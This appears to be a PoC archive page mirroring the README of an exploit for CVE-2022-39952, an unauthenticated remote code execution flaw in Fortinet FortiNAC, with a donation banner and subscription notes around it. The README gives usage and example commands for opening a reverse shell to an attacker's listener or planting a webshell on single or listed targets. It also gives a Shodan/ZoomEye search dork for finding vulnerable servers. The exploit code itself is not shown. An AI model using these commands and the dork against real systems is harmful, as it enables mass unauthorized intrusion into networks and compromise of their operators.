Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-39952 PoC — Fortinet FortiNAC 安全漏洞

Source
Associated Vulnerability
Title:Fortinet FortiNAC 安全漏洞 (CVE-2022-39952)
Description:A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.
Description
PoC for CVE-2022-39952 affecting Fortinet FortiNAC.
Readme
# FortiNAC CVE-2022-39952

## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.

> This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by [horizon3ai](https://github.com/horizon3ai/CVE-2022-39952), with additional options for targeting multiple hosts.

> Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.

## Usage:

```bash
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell
```

To use this exploit, you must have Python 3.x installed on your system.

## Requirements:
    Python 3.x
    requests module
    concurrent.futures module

## Examples:

### Execute a reverse shell on a single target:
```bash
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
```

### Execute a webshell on a single target:
```
$ python exploit.py -t 192.168.1.100
```

### Execute a webshell on multiple targets from a list:
```bash
$ python exploit.py -l targets.txt
```

## Note:

>This exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:

`title:"FortiNAC" +"JSESSIONID"`
File Snapshot

[4.0K] /data/pocs/09bfcbc6075fa0baa09e8fb15169b54598795ba8 ├── [5.8K] exploit.py └── [1.5K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →